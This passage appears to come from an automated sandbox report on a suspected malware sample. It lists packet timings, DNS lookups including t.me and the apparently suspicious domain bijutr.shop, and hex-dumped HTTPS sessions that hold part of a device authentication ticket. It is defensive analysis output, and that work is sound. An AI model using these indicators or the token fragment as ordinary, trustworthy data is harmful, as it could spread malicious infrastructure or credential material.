                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.646157980 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.646469116 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.657291889 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.971491098 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977577925 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977611065 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977735043 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.977880955 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:58.984827995 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.299575090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.305198908 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.305350065 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.305387974 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.305496931 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.312041044 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.628215075 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.634573936 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.634588003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.634783983 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.634831905 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.641680956 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.968822002 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.972531080 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.972541094 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.972549915 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.972779989 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:59.978775024 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.294106960 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.301268101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.301304102 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.301314116 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.302757978 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.309658051 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.625351906 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.631308079 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.631382942 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.631505013 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.631678104 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:00.636800051 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.052061081 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.058788061 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.058926105 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.059026003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.059453011 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.065012932 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.388536930 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.389626026 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.389698029 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.389730930 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.389955997 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.395709991 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.737392902 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.743356943 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.743407011 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.743536949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.743662119 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:01.749787092 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.066893101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.069782019 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.069839954 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.069895983 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.070038080 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.075146914 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.404522896 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.404534101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.404544115 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.404552937 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:29:02.891964912 CET4435410823.209.72.39192.168.2.6

                                                                                                                                                                                                                                                                                                        ICMP Packets

                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.923336983 CET192.168.2.61.1.1.1c255(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.814146996 CET192.168.2.61.1.1.1c24c(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:59.652141094 CET192.168.2.61.1.1.10xf389Standard query (0)NsxXzupCMoDsL.NsxXzupCMoDsLA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.444346905 CET192.168.2.61.1.1.10xb160Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.543375015 CET192.168.2.61.1.1.10x6082Standard query (0)bijutr.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.422966003 CET192.168.2.61.1.1.10x2efaStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.423118114 CET192.168.2.61.1.1.10x1589Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.552251101 CET192.168.2.61.1.1.10x6343Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.552359104 CET192.168.2.61.1.1.10x2cf5Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:23.948728085 CET192.168.2.61.1.1.10x837eStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:23.949038029 CET192.168.2.61.1.1.10x145Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.487586021 CET192.168.2.61.1.1.10x49c0Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.487981081 CET192.168.2.61.1.1.10x597fStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.018891096 CET192.168.2.61.1.1.10xc358Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.019294024 CET192.168.2.61.1.1.10x525cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.022005081 CET192.168.2.61.1.1.10x9251Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.022485018 CET192.168.2.61.1.1.10x2fdcStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.033370972 CET192.168.2.61.1.1.10x7ac2Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.033798933 CET192.168.2.61.1.1.10x6592Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.623245955 CET192.168.2.61.1.1.10x8fa7Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.623352051 CET192.168.2.61.1.1.10xb178Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.634798050 CET192.168.2.61.1.1.10xa257Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.634932041 CET192.168.2.61.1.1.10x507fStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.763448954 CET192.168.2.61.1.1.10x10acStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.763608932 CET192.168.2.61.1.1.10x8564Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.908133984 CET192.168.2.61.1.1.10xffb0Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.908287048 CET192.168.2.61.1.1.10xc5c2Standard query (0)api.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:59.897907972 CET1.1.1.1192.168.2.60xf389Name error (3)NsxXzupCMoDsL.NsxXzupCMoDsLnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.583091974 CET1.1.1.1192.168.2.60xb160No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.874469995 CET1.1.1.1192.168.2.60x6082No error (0)bijutr.shop188.245.216.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.560391903 CET1.1.1.1192.168.2.60x2efaNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.560415030 CET1.1.1.1192.168.2.60x1589No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.689524889 CET1.1.1.1192.168.2.60x2cf5No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.693130970 CET1.1.1.1192.168.2.60x6343No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:22.168806076 CET1.1.1.1192.168.2.60x1dbNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:22.168806076 CET1.1.1.1192.168.2.60x1dbNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:22.256850004 CET1.1.1.1192.168.2.60x5a4cNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.092684031 CET1.1.1.1192.168.2.60x145No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.201147079 CET1.1.1.1192.168.2.60x837eNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.624630928 CET1.1.1.1192.168.2.60x49c0No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.624630928 CET1.1.1.1192.168.2.60x49c0No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.814085960 CET1.1.1.1192.168.2.60x597fNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157049894 CET1.1.1.1192.168.2.60xc358No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157049894 CET1.1.1.1192.168.2.60xc358No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157109976 CET1.1.1.1192.168.2.60x525cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160084009 CET1.1.1.1192.168.2.60x9251No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160084009 CET1.1.1.1192.168.2.60x9251No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160903931 CET1.1.1.1192.168.2.60x2fdcNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171585083 CET1.1.1.1192.168.2.60x7ac2No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171585083 CET1.1.1.1192.168.2.60x7ac2No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171863079 CET1.1.1.1192.168.2.60x6592No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET1.1.1.1192.168.2.60x8fa7No error (0)sb.scorecardresearch.com18.161.69.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.772022963 CET1.1.1.1192.168.2.60xa257No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.772808075 CET1.1.1.1192.168.2.60x507fNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.902776003 CET1.1.1.1192.168.2.60x10acNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.902831078 CET1.1.1.1192.168.2.60x8564No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:27.045588017 CET1.1.1.1192.168.2.60xc5c2No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:27.048626900 CET1.1.1.1192.168.2.60xffb0No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                        • t.me
                                                                                                                                                                                                                                                                                                        • bijutr.shop
                                                                                                                                                                                                                                                                                                        • www.google.com
                                                                                                                                                                                                                                                                                                        • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                        • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        • https:
                                                                                                                                                                                                                                                                                                          • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                          • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                          • c.msn.com

                                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                        0192.168.2.64971520.198.119.84443
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:00 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 32 4a 41 37 56 58 79 6b 46 30 4f 49 6f 58 70 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 39 38 31 66 63 34 39 39 37 35 64 37 38 63 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: 2JA7VXykF0OIoXpz.1Context: 9981fc49975d78cf
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:00 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:00 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 32 4a 41 37 56 58 79 6b 46 30 4f 49 6f 58 70 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 39 38 31 66 63 34 39 39 37 35 64 37 38 63 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 33 63 4c 59 5a 74 57 55 43 4a 71 41 63 32 53 58 55 68 66 70 6a 5a 33 66 36 65 53 46 4b 64 6c 6d 68 64 33 31 75 6d 37 2f 73 33 47 51 59 34 79 33 62 4a 6a 34 71 7a 42 72 39 34 6e 69 75 51 39 4b 4b 61 52 44 4a 61 76 78 76 6e 37 75 51 65 36 43 72 53 74 31 76 46 51 6d 4d 42 6d 59 48 62 47 68 56 38 4b 71 4a 35 5a 64 4d 79 72 70
                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 2JA7VXykF0OIoXpz.2Context: 9981fc49975d78cf<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:00 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 32 4a 41 37 56 58 79 6b 46 30 4f 49 6f 58 70 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 39 38 31 66 63 34 39 39 37 35 64 37 38 63 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 2JA7VXykF0OIoXpz.3Context: 9981fc49975d78cf<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:01 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:01 UTC58INData Raw: 4d 53 2d 43 56 3a 20 70 59 6a 71 64 2f 30 6e 73 30 65 4b 59 42 67 47 44 6e 59 4d 47 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: pYjqd/0ns0eKYBgGDnYMGg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                        1192.168.2.64973120.198.119.84443
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:12 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 68 6e 61 6e 68 71 46 55 35 30 75 77 6c 6e 49 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 31 30 33 33 62 62 63 30 33 63 30 62 63 62 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 304MS-CV: hnanhqFU50uwlnIc.1Context: c1033bbc03c0bcb
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
